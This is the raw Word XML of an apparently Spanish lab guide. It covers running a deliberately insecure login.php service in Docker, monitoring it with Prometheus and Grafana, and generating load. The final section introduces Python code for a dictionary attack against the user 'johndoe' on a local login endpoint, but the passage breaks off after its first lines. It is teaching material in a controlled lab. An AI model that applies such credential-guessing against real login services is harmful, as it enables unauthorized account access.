        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483E5A37" wp14:editId="2FFFD139">
            <wp:extent cx="4167682" cy="1704421"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="2576038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383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6"/>
                    <a:srcRect r="1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12" cy="17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E2CD" w14:textId="27389071" w:rsidR="00097EFB" w:rsidRDefault="00097EFB" w:rsidP="00097EFB">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc203361924"/>
      <w:r>
        <w:t>Levantamos nuestros Dockers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="6D078E5F" w14:textId="265CA945" w:rsidR="004B75FB" w:rsidRDefault="004B75FB" w:rsidP="004B75FB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc203361925"/>
      <w:r>
        <w:t>Servicio login.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1B8AD7FB" w14:textId="2A1B1BD5" w:rsidR="00097EFB" w:rsidRDefault="00097EFB" w:rsidP="00097EFB">
      <w:r>
        <w:t xml:space="preserve">Nos aseguramos de tener levantado el servicio objetivo que en nuestro caso es la versión no segura disponible en </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://localhost:8080/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11A092E8" w14:textId="12A5DF1E" w:rsidR="00097EFB" w:rsidRDefault="00F82115" w:rsidP="00BC71B1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F82115">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="006D4989" wp14:editId="4BB4D8A8">
            <wp:extent cx="5394330" cy="1562986"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18108716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16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010" cy="15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16D" w14:textId="3D53FC19" w:rsidR="00F82115" w:rsidRDefault="00F82115" w:rsidP="00097EFB">
      <w:r>
        <w:t>Podemos probar con Postman haciendo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E3D34" w14:textId="0F64D896" w:rsidR="00F82115" w:rsidRDefault="0042645A" w:rsidP="00BC71B1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0042645A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD5B208" wp14:editId="1DDE8A38">
            <wp:extent cx="5338223" cy="2232838"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21287122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22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6864" cy="22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94E5" w14:textId="706BCCA7" w:rsidR="004B75FB" w:rsidRDefault="004B75FB" w:rsidP="004B75FB">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc203361926"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Servicios Prometheus y Grafana</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="3EBB529A" w14:textId="49C9E30E" w:rsidR="00BC71B1" w:rsidRDefault="00BC71B1" w:rsidP="00097EFB">
      <w:r>
        <w:t>A continuación</w:t>
      </w:r>
      <w:r w:rsidR="004B75FB">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> levantamos el stack recién creado mediante los comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6C7CF" w14:textId="77777777" w:rsidR="00F51C5E" w:rsidRPr="00F51C5E" w:rsidRDefault="00F51C5E" w:rsidP="00F51C5E">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F51C5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1037A824" w14:textId="795C1B33" w:rsidR="00BC71B1" w:rsidRDefault="00F51C5E" w:rsidP="00F51C5E">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F51C5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5613F3" w14:textId="6D7A38FA" w:rsidR="00F51C5E" w:rsidRDefault="00B620EC" w:rsidP="00F51C5E">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B620EC">
        <w:t xml:space="preserve">Si todo va bien </w:t>
      </w:r>
      <w:r>
        <w:t>tenemos ahora tres contenedores más en ejecución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E53BBC" w14:textId="3E7C9936" w:rsidR="00B620EC" w:rsidRDefault="00B620EC" w:rsidP="00F51C5E">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B620EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D0E6FAD" wp14:editId="20FF096A">
            <wp:extent cx="5400040" cy="1377950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17755867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867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F774" w14:textId="54333A91" w:rsidR="00B620EC" w:rsidRPr="00B620EC" w:rsidRDefault="00D517F6" w:rsidP="004B75FB">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc203361927"/>
      <w:r w:rsidRPr="00D517F6">
        <w:t>Crear Dashboard en Grafana</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1EDC0311" w14:textId="21D9BA11" w:rsidR="000713FD" w:rsidRDefault="00DF465E" w:rsidP="00DC58AC">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>Siga los siguientes pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69812666" w14:textId="73C565CB" w:rsidR="00DF465E" w:rsidRDefault="00DF465E" w:rsidP="0039345A">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accede a </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00117D9D" w:rsidRPr="003064F8">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://localhost:3000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00117D9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F21223D" w14:textId="55B1B15A" w:rsidR="00DF465E" w:rsidRDefault="00DF465E" w:rsidP="0039345A">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>Usuario: admin, Contraseña: admin</w:t>
      </w:r>
      <w:r w:rsidR="0039345A">
        <w:t xml:space="preserve"> (se te pedirá cambiarla en el primer acceso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088BA451" w14:textId="38F9276F" w:rsidR="00DF465E" w:rsidRDefault="00DF465E" w:rsidP="0039345A">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>Conecta Prometheus (</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00875BA3" w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://prometheus:9090</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBECDEB" w14:textId="77777777" w:rsidR="00875BA3" w:rsidRDefault="00875BA3" w:rsidP="00875BA3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>En el menú lateral izquierdo, haz clic en "Configuration/Data Sources" y a continuación en "Add data source"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC6BE80" w14:textId="77777777" w:rsidR="00875BA3" w:rsidRDefault="00875BA3" w:rsidP="00875BA3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>Selecciona Prometheus y como URL: http://prometheus:9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FC1C86" w14:textId="55460E6F" w:rsidR="00875BA3" w:rsidRDefault="00875BA3" w:rsidP="00875BA3">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00117D9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Haz clic en "Save &amp; test". </w:t>
      </w:r>
      <w:r>
        <w:t>Debería mostrar un mensaje de éxito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D69D4" w14:textId="59D616D2" w:rsidR="00DF465E" w:rsidRPr="0039345A" w:rsidRDefault="00DF465E" w:rsidP="0039345A">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0039345A">
        <w:t>Crea</w:t>
      </w:r>
      <w:r w:rsidR="008B30A4">
        <w:t>r un dashboard y dentro</w:t>
      </w:r>
      <w:r w:rsidRPr="0039345A">
        <w:t xml:space="preserve"> paneles con, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D85605" w14:textId="77777777" w:rsidR="00DF465E" w:rsidRDefault="00DF465E" w:rsidP="008B30A4">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF465E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>node_memory_MemAvailable_bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1737C41B" w14:textId="07BA4D6A" w:rsidR="00AD38B0" w:rsidRPr="00DF465E" w:rsidRDefault="00AD38B0" w:rsidP="00AD38B0">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD38B0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11389BE0" wp14:editId="032EEDB5">
            <wp:extent cx="4529470" cy="1737876"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="3274536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53660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6066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DFA6" w14:textId="77777777" w:rsidR="00DF465E" w:rsidRPr="00DF465E" w:rsidRDefault="00DF465E" w:rsidP="008B30A4">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF465E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>node_cpu_seconds_total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BFA46" w14:textId="0E76488F" w:rsidR="00DF465E" w:rsidRPr="00DF465E" w:rsidRDefault="00DF465E" w:rsidP="008B30A4">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF465E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>node_network_receive_bytes_total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A6D54" w14:textId="11541CEA" w:rsidR="00D411B9" w:rsidRDefault="00C86F45" w:rsidP="00CB5B97">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C86F45">
        <w:lastRenderedPageBreak/>
        <w:t>Lo que p</w:t>
      </w:r>
      <w:r>
        <w:t>asará es que se creará la monitorización pero los paneles apenas mostrarán movimiento, Esto es porque el contenedor no tiene o apenas tiene carga de trabajo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29088513" w14:textId="255C0176" w:rsidR="00C86F45" w:rsidRDefault="00CB5B97" w:rsidP="00CB5B97">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Como </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5B97">
        <w:t>node-exporter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> depende del sistema lo más fácil para ver movimiento es cargar el sistema con cosas ajenas los Dockers y que consuman mucho ancho de banda, memoria, etc. En cualquier caso, vamos a simular esa carga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422A2AA" w14:textId="5DE2035E" w:rsidR="00117D9D" w:rsidRDefault="00117D9D" w:rsidP="00117D9D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc203361928"/>
      <w:r>
        <w:t>Importando Dashboards realizados por otros usuarios</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="402D726C" w14:textId="77777777" w:rsidR="00117D9D" w:rsidRDefault="00117D9D" w:rsidP="00117D9D">
      <w:r>
        <w:t>Podemos importar Dashboards utilizando la opción:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CDE384" w14:textId="77777777" w:rsidR="00117D9D" w:rsidRDefault="00117D9D" w:rsidP="00117D9D">
      <w:r w:rsidRPr="00117D9D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB31F55" wp14:editId="199E3844">
            <wp:extent cx="5400040" cy="955675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="257711955" name="Imagen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1955" name="Imagen 1" descr="Imagen que contiene For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0278" w14:textId="44E25DF1" w:rsidR="00117D9D" w:rsidRDefault="00117D9D" w:rsidP="00117D9D">
      <w:r>
        <w:t xml:space="preserve">Que nos lleva a una pantalla donde podemos importar Dashboards públicos compartidos en la  la siguiente dirección:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="003064F8">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://grafana.com/grafana/dashboards/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Por ejemplo, si nos gusta NodeExporterFull, disponible en </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="003064F8">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://grafana.com/grafana/dashboards/1860-node-exporter-full/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> será suficiente con usar el Id 1860 para aplicar este Dashboard a nuestra monitorización con Prometheus, obteniendo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882B5A7" w14:textId="69F0CA0F" w:rsidR="00117D9D" w:rsidRDefault="00117D9D" w:rsidP="00CB5B97">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="00117D9D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55849357" wp14:editId="72AC8DF1">
            <wp:extent cx="5400040" cy="1500505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1114704340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4340" name="Imagen 1" descr="Captura de pantalla de un videojueg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8726" w14:textId="77777777" w:rsidR="008C5CC6" w:rsidRDefault="008C5CC6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45523C14" w14:textId="53920FBC" w:rsidR="00C24476" w:rsidRDefault="00C24476" w:rsidP="00C24476">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc203361929"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Simulando carga</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0219DA01" w14:textId="6F2D0692" w:rsidR="004B75FB" w:rsidRDefault="004B75FB" w:rsidP="004B75FB">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc203361930"/>
      <w:r>
        <w:t>Código Python de llamada a servicio PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="08E94663" w14:textId="735E4213" w:rsidR="00C24476" w:rsidRDefault="0042645A">
      <w:r>
        <w:t>Para smular carga copiamos de Postman el código Python asociado a la llamada</w:t>
      </w:r>
      <w:r w:rsidR="00BC71B1">
        <w:t>, por ejemplo, copiando la versión basada ne la librería request.</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B0CE01" w14:textId="384F1231" w:rsidR="0042645A" w:rsidRDefault="00BC71B1">
      <w:r w:rsidRPr="00BC71B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C79B964" wp14:editId="4F3D66D4">
            <wp:extent cx="5400040" cy="3160395"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="7609488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88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83FF" w14:textId="689493DE" w:rsidR="00C24476" w:rsidRDefault="00BC71B1">
      <w:r>
        <w:t>Necesitamos para ejecutar este código o mejor aún un ataque basado en este código disponer en nuestro ordenador de la opción de desarrollar programas en Python,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4EB32" w14:textId="576C6F5D" w:rsidR="006C1E5E" w:rsidRDefault="00C24476" w:rsidP="006C1E5E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Toc203361931"/>
      <w:r w:rsidR="00AA173A">
        <w:lastRenderedPageBreak/>
        <w:t>Instalación Visual Studio Code y Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="73753925" w14:textId="6BA12E76" w:rsidR="00AA173A" w:rsidRDefault="00AA173A" w:rsidP="00943895">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t>Para poder ejecutar programas en Python vamos a seguir las instrucciones de:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E08A3C" w14:textId="3D0E69AB" w:rsidR="00AA173A" w:rsidRDefault="00581455" w:rsidP="00AA173A">
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://code.visualstudio.com/docs/python/python-tutorial</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F7269EE" w14:textId="6D66C26F" w:rsidR="00581455" w:rsidRDefault="00581455" w:rsidP="00EB49E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57053066" w14:textId="07EB61CA" w:rsidR="00EB49E5" w:rsidRDefault="00EB49E5" w:rsidP="00EB49E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Instalar Pyhton:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAF6F0" w14:textId="1ADDFE21" w:rsidR="00EB49E5" w:rsidRDefault="00EB49E5" w:rsidP="00EB49E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB49E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.python.org/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B671C55" w14:textId="3A0A8ACB" w:rsidR="00EB49E5" w:rsidRPr="009E56DA" w:rsidRDefault="00EB49E5" w:rsidP="00EB49E5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mac. </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="002E4702" w:rsidRPr="002E4702">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://brew.sh/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002E4702" w:rsidRPr="002E4702">
        <w:t xml:space="preserve"> y l</w:t>
      </w:r>
      <w:r w:rsidR="002E4702">
        <w:t xml:space="preserve">uego </w:t>
      </w:r>
      <w:r w:rsidR="002E4702" w:rsidRPr="002E4702">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>brew install python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08789367" w14:textId="17FEC053" w:rsidR="009E56DA" w:rsidRPr="002E4702" w:rsidRDefault="009E56DA" w:rsidP="009E56DA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Es fundamental marcar la opción de añadir Python al PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73681611" w14:textId="670610B0" w:rsidR="002E4702" w:rsidRDefault="002E4702" w:rsidP="002E4702">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Instalar Visual Studio Code</w:t>
      </w:r>
      <w:r w:rsidR="009E56DA" w:rsidRPr="009E56DA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="009E56DA" w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://code.visualstudio.com/Download</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009E56DA">
        <w:t xml:space="preserve"> donde </w:t>
      </w:r>
      <w:r w:rsidR="00712063">
        <w:t xml:space="preserve">se recomienda usar la versión </w:t>
      </w:r>
      <w:r w:rsidR="009E56DA">
        <w:t>“System Installer”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFCF508" w14:textId="26CC53D1" w:rsidR="009E56DA" w:rsidRDefault="006A6E35" w:rsidP="002E4702">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Instalar la extensión para Python y seguir los pasos dados en:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42637C5F" w14:textId="265F0D8F" w:rsidR="006A6E35" w:rsidRDefault="006A6E35" w:rsidP="006A6E35">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://code.visualstudio.com/docs/python/python-tutorial</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CEAB226" w14:textId="77777777" w:rsidR="006A6E35" w:rsidRDefault="006A6E35" w:rsidP="00DA14E9"/>
    <w:p w14:paraId="3BFC1A74" w14:textId="7375D566" w:rsidR="00DA14E9" w:rsidRDefault="00DA14E9" w:rsidP="00943895">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t>Es esencial continuar hasta los últimos pasos donde se incide en la importancia de usar “pip” como gestor de dependencias o instalador de librerías de terceros</w:t>
      </w:r>
      <w:r w:rsidR="00DA44DA">
        <w:t>, como por ejemplo, en nuestro caso instalar la librería requests con el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E7DEF" w14:textId="4042D315" w:rsidR="00DA44DA" w:rsidRDefault="00DA44DA" w:rsidP="00943895">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA44DA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>pip install requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7FF39" w14:textId="2D126CD8" w:rsidR="00DA44DA" w:rsidRPr="00943895" w:rsidRDefault="00FB287F" w:rsidP="00943895">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r w:rsidRPr="00943895">
        <w:t>Por ejemplo, el siguiente código hace un ataque de diccionario sobre el usuario johndoe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677CB73E" w14:textId="77777777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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1BF8C" w14:textId="77777777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url = "http://api.local:8080/login.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E0DBE" w14:textId="285F6A6A" w:rsidR="00943895" w:rsidRPr="00117D9D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17D9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username = "johndoe"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE2CCA5" w14:textId="77777777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with open("password_dict.txt", "r") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1B88C" w14:textId="165413DB" w:rsidR="00943895" w:rsidRPr="00943895" w:rsidRDefault="009B691F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43895" w:rsidRPr="00943895">
